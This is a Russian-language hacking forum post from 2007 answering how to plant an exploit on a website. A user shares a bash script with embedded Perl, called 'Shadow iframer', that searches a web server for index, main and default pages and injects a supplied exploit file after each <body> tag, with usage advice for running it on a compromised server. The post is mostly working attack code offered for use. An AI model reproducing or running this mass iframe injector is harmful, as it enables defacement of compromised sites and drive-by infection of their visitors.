Тема: как залит експлоит на сайт ????????
Показать сообщение отдельно

  #7  
Старый 03.05.2007, 01:12
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
С нами: 10038327

Репутация: 251


По умолчанию
На пользуйся! С тя плюс. Запускается /bin/bash iframe_script
Права лучше nobody!

Код:
#!/bin/bash

usage () {
  echo "##################################################  ######"
  echo "#Shadow iframer[local][n0b0dy version]  (c)ode by Gh0s7#"
  echo "##################################################  ######"
  echo "#usage: ./sh-iframe.sh [iframe file] [path]            #"
  echo "#       ./sh-iframe.sh exploit.html /var/www/31337.su  #"
  echo "##################################################  ######"
  exit 1
}

check=`expr length "$1"`
if [ $check == 0 ]; then 
  usage
fi

check=`expr length "$2"`
if [ $check == 0 ]; then 
  usage
fi

if [ ! -d $2 ]; then
  echo "[x] $2 directory doesnt exists"; exit 1
fi

echo -n "[*]Searching for perl..."; which perl

if [ $? != 0 ]; then
  echo "[x]No perl?"; exit
fi

echo -n "[*]Starting index finder...please wait..."

find $2 -name "index.html*" 2> /dev/null > /tmp/found 
find $2 -name "index.php*"  2> /dev/null >> /tmp/found 
find $2 -name "index.shtml" 2> /dev/null >> /tmp/found 
find $2 -name "index.phtml" 2> /dev/null >> /tmp/found 
find $2 -name "main.html*" 2> /dev/null > /tmp/found 
find $2 -name "main.php*"  2> /dev/null >> /tmp/found 
find $2 -name "default.php*"  2> /dev/null >> /tmp/found 
find $2 -name "main.shtml" 2> /dev/null >> /tmp/found 

len=`cat /tmp/found| wc -l`

echo "search complete. Found $len pages"
echo -n "[*]Generating iframer..."

iframer='\n
while (<INPUT>) {
  chomp; $file = $_;
  @res = split (/\//);
  $len = 0;
  foreach (@res) { $len++; }
  open (FILE, "<$_") or next;
  open (TMP, ">/tmp/$res[$len-1]") or next;
  open (INJECT, "<$inject") or die;
  sysread (INJECT, $code, 1024);
  close (INJECT);
  while (<FILE>) {
    print TMP $_;
    if (/<body>/) { print TMP $code; }
  }
  close (TMP);
  close (FILE);
  system ("./rm /tmp/$res[$len-1].bak 2>/dev/null");
  system ("./mv $file /tmp/$res[$len-1].bak");
  system ("./mv /tmp/$res[$len-1] $file");
}'
echo -ne "#!/usr/bin/perl -w\nopen (INPUT, \"</tmp/found\");\n\$inject=\"$1\";\n" > iframer.pl
echo -ne "$iframer" >> iframer.pl

echo 'mv $@' > /tmp/mv; chmod +x /tmp/mv
echo 'rm $@' > /tmp/rm; chmod +x /tmp/rm

echo "complete.Starting iframer"
perl iframer.pl
echo "[*] Injecting complete, deleting temp files..."
rm /tmp/mv /tmp/rm
rm /tmp/index*
echo "[*] Finished"
exit 0
 
Ответить с цитированием